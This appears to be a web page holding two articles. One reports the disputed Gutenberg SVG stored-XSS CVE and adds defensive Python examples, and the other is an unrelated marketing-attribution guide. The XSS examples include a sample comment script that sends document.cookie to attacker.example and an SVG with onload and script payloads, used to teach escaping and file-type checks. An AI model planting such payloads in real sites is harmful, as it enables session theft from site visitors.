



Vulnerability Found In WordPress Gutenberg Plugin?

The United States government’s National Vulnerability Database published an entry for a vulnerability reported in the official WordPress Gutenberg plugin. But according to the researcher who found it, WordPress has not acknowledged it as a vulnerability.

Stored Cross-Site Scripting (XSS) Vulnerability

Cross-site scripting is a vulnerability in which attacker-controlled input ends up in a web page without proper validation or encoding, so that the victim’s browser executes it as script running with the site’s own origin. In a stored (persistent) XSS the payload is saved on the server, for example in a comment, a profile field or an uploaded file, and is served to every user who views that content.

Most forms and other website inputs validate that what is submitted is what the application expects, encode it for the context in which it is displayed, and, for uploads, filter out dangerous file types.

A file-based example is an image upload that fails to block an SVG. SVG is an XML document that can carry <script> elements and event handlers, so if the site serves that file from its own domain, opening it runs the attacker’s script as that site.
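To make the mechanism concrete, here is an added example, not code from WordPress, Gutenberg or the article, of a stored XSS in a toy comment renderer next to its fixed form. The comment store, the page template and the attacker’s payload are constructed for illustration.

```python
import html

# Constructed sample of stored content: comments persisted by a site, the second
# one submitted by an attacker. Nothing here runs in a browser; the point is what
# the server sends back to every visitor.
STORED_COMMENTS = [
    "Nice post!",
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
]

PAGE_TEMPLATE = "<html><body><h1>Comments</h1>{body}</body></html>"


def render_unsafe(comments):
    """Vulnerable: stored strings are concatenated straight into the HTML.

    The attacker's comment becomes a real <script> element in the response, so
    every visitor's browser runs it with the site's own origin (cookies, session
    storage and DOM included). That is a stored XSS.
    """
    body = "".join(f"<p>{c}</p>" for c in comments)
    return PAGE_TEMPLATE.format(body=body)


def render_safe(comments):
    """Fixed: untrusted text is HTML-encoded for the element-content context.

    '<', '>', '&' and quotes become entities, so the browser displays the literal
    characters "<script>" and executes nothing.
    """
    body = "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in comments)
    return PAGE_TEMPLATE.format(body=body)


def has_live_script(page):
    """Crude marker check: a real <script tag, as opposed to its entity form."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe render contains live script:", has_live_script(render_unsafe(STORED_COMMENTS)))
    print("safe render contains live script:  ", has_live_script(render_safe(STORED_COMMENTS)))
```

html.escape is the right encoder for text between tags only. An attribute value, a URL, a JavaScript string or a CSS value each needs its own context-specific encoding, and a whole file such as an SVG served from the site’s domain is a document the browser can execute on its own, which no encoding of the surrounding page addresses.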

According to the non-profit Open Web Application Security Project, an organization focused on helping improve software security, this is what can happen with a successful XSS attack:

“An attacker can use XSS to send a malicious script to an unsuspecting user.

The end user’s browser has no way to know that the script should not be trusted, and will execute the script.

Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

These scripts can even rewrite the content of the HTML page.”

Common Vulnerabilities and Exposures – CVE

Common Vulnerabilities and Exposures (CVE) is a program for documenting publicly disclosed vulnerabilities and publicizing the discoveries.

The program, which the U.S. Department of Homeland Security sponsors, reviews reported vulnerabilities and, if it accepts a report, assigns a CVE ID that serves as the identification number for that specific vulnerability.

Discovery Of Vulnerability In Gutenberg

Security researchers discovered what they believed to be a vulnerability. The discovery was submitted to the CVE program, accepted, and assigned a CVE ID, making it a publicly catalogued vulnerability. Note that assignment of an ID records that the report was accepted into the catalogue; it is not a confirmation by the vendor that the issue is exploitable, which is what the disagreement described below turns on.

The XSS vulnerability was given the ID number CVE-2022-33994.

The vulnerability report that was published on the CVE site contains this description:

“The Gutenberg plugin through 13.7.3 for WordPress allows stored XSS by the Contributor role via an SVG document to the “Insert from URL” feature.

NOTE: the XSS payload does not execute in the context of the WordPress instance’s domain; however, analogous attempts by low-privileged users to reference SVG documents are blocked by some similar products, and this behavioral difference might have security relevance to some WordPress site administrators.”

That means a user with the Contributor role can cause an externally hosted SVG, which can contain script, to be referenced from a post.

The way to do it is by inserting the image through a URL. Because the SVG is loaded from the attacker’s URL rather than from the site’s own domain, any script in it runs in the context of that external origin, which is why the CVE text notes that the payload does not execute in the WordPress instance’s domain.

In Gutenberg, there are three ways to upload an image.

  1. Upload it
  2. Choose an existing image from the WordPress Media Library
  3. Insert the image from a URL

That last method is where the reported issue comes from because, according to the security researcher, an image with any file extension, SVG included, can be inserted via a URL, whereas the upload feature rejects such files.
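The behaviour the researcher attributes to Google and Slack, rejecting a remotely referenced file once it turns out to be SVG, is straightforward to implement wherever the server actually fetches the file. The following is an added example in Python, not code from WordPress or Gutenberg, of a check that sniffs the fetched bytes instead of trusting the file extension or the Content-Type header. The function names and the sample payloads are constructed for illustration.

```python
import re

# Magic bytes of the raster formats we are willing to accept (an allowlist).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
GIF_MAGICS = (b"GIF87a", b"GIF89a")
ALLOWED_TYPES = {"png", "jpeg", "gif", "webp"}

# An SVG is XML text whose root element is <svg>, possibly preceded by a BOM,
# an XML prolog, a DOCTYPE or comments, so the root is searched for, not
# expected at offset 0.
_SVG_ROOT = re.compile(rb"<svg[\s>/]", re.IGNORECASE)


def sniff_image_type(data: bytes) -> str:
    """Classify image bytes by content, ignoring any name or header metadata."""
    head = data[:16]
    if head.startswith(PNG_MAGIC):
        return "png"
    if head.startswith(JPEG_MAGIC):
        return "jpeg"
    if head.startswith(GIF_MAGICS):
        return "gif"
    if head[:4] == b"RIFF" and head[8:12] == b"WEBP":
        return "webp"
    text = data[3:] if data.startswith(b"\xef\xbb\xbf") else data
    if _SVG_ROOT.search(text):
        return "svg"
    return "unknown"


def accept_remote_image(filename: str, content_type: str, body: bytes):
    """Decide whether a file fetched from a user-supplied URL may be embedded.

    Returns (accepted, detected_type). The extension and Content-Type are
    available for logging but deliberately play no part in the decision.
    """
    detected = sniff_image_type(body)
    return detected in ALLOWED_TYPES, detected


# Constructed samples (not complete image files; only the leading bytes matter here).
PNG_SAMPLE = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
JPEG_SAMPLE = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00"
SVG_SAMPLE = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b"<!-- looks like an icon -->\n"
    b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">\n'
    b"  <script>alert(document.cookie)</script>\n"
    b"</svg>\n"
)


if __name__ == "__main__":
    for name, ctype, body in [
        ("photo.png", "image/png", PNG_SAMPLE),
        ("logo.jpg", "image/jpeg", JPEG_SAMPLE),
        ("icon.svg", "image/svg+xml", SVG_SAMPLE),
        # Extension and header lie; the bytes are still SVG and are rejected.
        ("photo.png", "image/png", SVG_SAMPLE),
    ]:
        ok, kind = accept_remote_image(name, ctype, body)
        print(f"{name:10} {ctype:14} -> {kind:8} {'accept' if ok else 'reject'}")
```

The allowlist shape matters: anything the sniffer cannot positively identify is rejected, so a new script-capable format does not slip through as "not SVG". The check only helps where the server fetches and re-hosts the file. If a feature merely embeds the supplied URL, as the CVE note’s remark about the payload not running in the site’s domain suggests here, there are no server-side bytes to inspect and the decision has to be made at the point where the URL is taken in.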

Is It Really A Vulnerability?

The researcher reported the vulnerability to WordPress. But according to the person who discovered it, WordPress didn’t acknowledge it as a vulnerability.

This is what the researcher wrote:

“I found a Stored Cross Site Scripting vulnerability in WordPress that got rejected and got labeled as Informative by the WordPress Team.

Today is the 45th day since I reported the vulnerability and yet the vulnerability is not patched as of writing this…”

So there is a question as to whether WordPress is right and the U.S. Government-supported CVE program is wrong (or vice versa) about whether this is an XSS vulnerability.

The researcher insists that this is a real vulnerability and offers the CVE acceptance as validation of that claim.

Furthermore, the researcher suggests that allowing images to be inserted via a URL without checking what they are may not be good practice, noting that other companies do not allow that kind of insertion.

“If this is so, then tell me why… …companies like Google and Slack went to the extent of validating files that are loaded over an URL and rejecting the files if they’re found to be SVG!

Google and Slack… don’t allow SVG files to load over an URL, which WordPress does!”

What To Do?

WordPress hasn’t issued a fix because it appears not to consider this a vulnerability, or at least not one that presents a problem.

The CVE entry states that Gutenberg versions up to and including 13.7.3 are affected.

But 13.7.3 was the most current version at the time of writing.

According to the official WordPress Gutenberg changelog, which records past changes and also describes upcoming ones, no fix for this (alleged) vulnerability has shipped, and none is planned.

So the question is whether or not there is something to fix.


Sources:

  • U.S. Government Vulnerability Database report on the vulnerability: CVE-2022-33994 Detail
  • Report published on the official CVE site: CVE-2022-33994 Detail
  • The researcher’s findings: CVE-2022-33994: Stored XSS in WordPress

Featured image by Shutterstock/Kues





A Comprehensive Guide To Marketing Attribution Models

We all know that customers interact with a brand through multiple channels and campaigns (online and offline) along their path to conversion.

Surprisingly, within the B2B sector, the average customer is exposed to a brand 36 times before converting into a customer.

With so many touchpoints, it is difficult to really pin down just how much a marketing channel or campaign influenced the decision to buy.

This is where marketing attribution comes in.

Marketing attribution provides insights into the most effective touchpoints along the buyer journey.

In this comprehensive guide, we simplify everything you need to know to get started with marketing attribution models, including an overview of your options and how to use them.

What Is Marketing Attribution?

Marketing attribution is the rule (or set of rules) that says how the credit for a conversion is distributed across a buyer’s journey.

How much credit each touchpoint should get is one of the more complicated marketing topics, which is why so many different types of attribution models are used today.

6 Common Attribution Models

There are six common attribution models, and each distributes conversion value across the buyer’s journey differently.

Don’t worry. We will help you understand all of the models below so you can decide which is best for your needs.

Note: The examples in this guide use Google Analytics 4 cross-channel rules-based models.

Cross-channel rules-based means that it ignores direct traffic. This may not be the case if you use alternative analytics software.

1. Last Click

The last click attribution model gives all the credit to the marketing touchpoint that happens directly before conversion.

Last Click helps you understand which marketing efforts close sales.

For example, a user initially discovers your brand by watching a YouTube Ad for 30 seconds (engaged view).

Later that day, the same user Googles your brand and clicks through an organic search result.

The following week this user is shown a retargeting ad on Facebook, clicks through, and signs up for your email newsletter.

The next day, they click through the email and convert to a customer.

Under a last-click attribution model, 100% of the credit for that conversion is given to email, the touchpoint that closed the sale.

2. First Click

The first click is the opposite of the last click attribution model.

All of the credit for any conversion that may happen is awarded to the first interaction.

The first click helps you to understand which channels create brand awareness.

It doesn’t matter if the customer clicked through a retargeting ad and later converted through an email visit.

If the customer initially interacted with your brand through an engaged YouTube view, Paid Video gets full credit for that conversion because it started the journey.

3. Linear

Linear attribution provides a look at your marketing strategy as a whole.

This model is especially useful if you need to maintain awareness throughout the entire buyer journey.

Credit for conversion is split evenly among all the channels a customer interacts with.

Let’s look at our example: Each of the four touchpoints (Paid Video, Organic, Paid Social, and Email) all get 25% of the conversion value because they’re all given equal credit.

4. Time Decay

Time Decay is useful for short sales cycles like a promotion because it considers when each touchpoint occurred.

The first touch gets the least amount of credit, while the last click gets the most.

Using our example:

  • Paid Video (YouTube engaged view) would get 10% of the credit.
  • Organic search would get 20%.
  • Paid Social (Facebook ad) gets 30%.
  • Email, which occurred the day of the conversion, gets 40%.

Note: Google Analytics 4 distributes this credit using a seven-day half-life.

5. Position-Based

The position-based (U-shaped) approach divides credit for a sale between the two most critical interactions: how a client discovered your brand and the interaction that generated a conversion.

With position-based attribution modeling, Paid Video (YouTube engaged view) and Email would each get 40% of the credit because they were the first and last interaction within our example.

Organic search and the Facebook Ad would each get 10%.

6. Data-Driven (Cross-Channel Linear)

Google Analytics 4 has a unique data-driven attribution model that uses machine learning algorithms.

Credit is assigned based on how each touchpoint changes the estimated conversion probability.

It uses each advertiser’s data to calculate the actual contribution an interaction had for every conversion event.
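As an added example, not code from Google Analytics or from the article, the rule-based models above applied in Python to the article’s four-touchpoint journey. The dates are constructed so that the two first touches fall on the same day, the Facebook click a week later and the email click the day after, matching the narrative; the time-decay figures therefore follow from the seven-day half-life rule rather than the rounded 10/20/30/40 split the text uses as an illustration. The data-driven model is left out because it depends on an advertiser’s own conversion data.

```python
from datetime import date

# Constructed sample journey matching the article's story: day 0 a YouTube
# engaged view, later that day an organic click, a Facebook click a week later,
# and an email click the following day, which is also the conversion day.
JOURNEY = [
    ("Paid Video", date(2022, 7, 1)),
    ("Organic Search", date(2022, 7, 1)),
    ("Paid Social", date(2022, 7, 8)),
    ("Email", date(2022, 7, 9)),
]
CONVERSION_DATE = date(2022, 7, 9)


def _share(journey, weights):
    """Normalise raw weights to fractions and aggregate them by channel name."""
    total = sum(weights)
    credit = {}
    for (channel, _), w in zip(journey, weights):
        credit[channel] = credit.get(channel, 0.0) + w / total
    return credit


def last_click(journey):
    return _share(journey, [0.0] * (len(journey) - 1) + [1.0])


def first_click(journey):
    return _share(journey, [1.0] + [0.0] * (len(journey) - 1))


def linear(journey):
    return _share(journey, [1.0] * len(journey))


def position_based(journey):
    """40% first touch, 40% last touch, remaining 20% split over the middle touches.

    Journeys of one or two touches have no middle, so the credit is all or half.
    """
    n = len(journey)
    if n == 1:
        return _share(journey, [1.0])
    if n == 2:
        return _share(journey, [0.5, 0.5])
    middle = 0.2 / (n - 2)
    return _share(journey, [0.4] + [middle] * (n - 2) + [0.4])


def time_decay(journey, conversion, half_life_days=7.0):
    """Each touch's weight halves for every half_life_days it precedes conversion."""
    weights = [0.5 ** ((conversion - when).days / half_life_days) for _, when in journey]
    return _share(journey, weights)


if __name__ == "__main__":
    models = [
        ("last click", last_click(JOURNEY)),
        ("first click", first_click(JOURNEY)),
        ("linear", linear(JOURNEY)),
        ("position-based", position_based(JOURNEY)),
        ("time decay", time_decay(JOURNEY, CONVERSION_DATE)),
    ]
    for name, credit in models:
        print(f"{name:15}", {channel: f"{share:.1%}" for channel, share in credit.items()})
```

With the seven-day half-life, the two same-day touches receive identical credit and email, on the conversion day, receives about 36% rather than the 40% in the illustration; the ordering of the channels is the same either way.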

Best Marketing Attribution Model

There isn’t necessarily a “best” marketing attribution model, and there’s no reason to limit yourself to just one.

Comparing performance under different attribution models will help you to understand the importance of multiple touchpoints along your buyer journey.

Model Comparison In Google Analytics 4 (GA4)

If you want to see how performance changes by attribution model, you can do that easily with GA4.

To access model comparison in Google Analytics 4, click “Advertising” in the left-hand menu and then click “Model comparison” under “Attribution.”

[Screenshot from GA4, July 2022]

By default, the conversion events will be all, the date range will be the last 28 days, and the dimension will be the default channel grouping.

Start by selecting the date range and conversion event you want to analyze.

[Screenshot: GA4 model comparison, choosing the conversion event and date range. From GA4, July 2022]

You can add a filter to view a specific campaign, geographic location, or device using the edit comparison option in the top right of the report.

[Screenshot: GA4 model comparison filter. From GA4, July 2022]

Select the dimension to report on and then use the drop-down menus to select the attribution models to compare.

[Screenshot: GA4 model comparison, selecting the dimension. From GA4, July 2022]

GA4 Model Comparison Example

Let’s say you’re asked to increase new customers to the website.

You could open Google Analytics 4 and compare the “last-click” model to the “first-click” model to discover which marketing efforts start customers down the path to conversion.

[Screenshot: GA4 model comparison for increasing new customers. From GA4, July 2022]

In the example above, we may choose to look further into email and paid search because they appear to be more effective at starting customers down the path to conversion than at closing the sale.

How To Change Google Analytics 4 Attribution Model

If you choose a different attribution model for your company, you can edit your attribution settings by clicking the gear icon in the bottom left-hand corner.

Open Attribution Settings under the property column and click the Reporting attribution model drop-down menu.

Here you can choose from the six cross-channel attribution models discussed above or the “ads-preferred last click model.”

Ads-preferred gives full credit to the last Google Ads click along the conversion path.

[Screenshot: editing GA4 attribution settings. From GA4, July 2022]

Please note that attribution model changes will apply to historical and future data.

Final Thoughts

Determining where and when a lead or purchase occurred is easy. The hard part is defining the reason behind a lead or purchase.

Comparing attribution modeling reports helps us to understand how the entire buyer journey supported the conversion.

Looking at this information in greater depth enables marketers to maximize ROI.

Got questions? Let us know on Twitter or LinkedIn.


Featured Image: Andrii Yalanskyi/Shutterstock

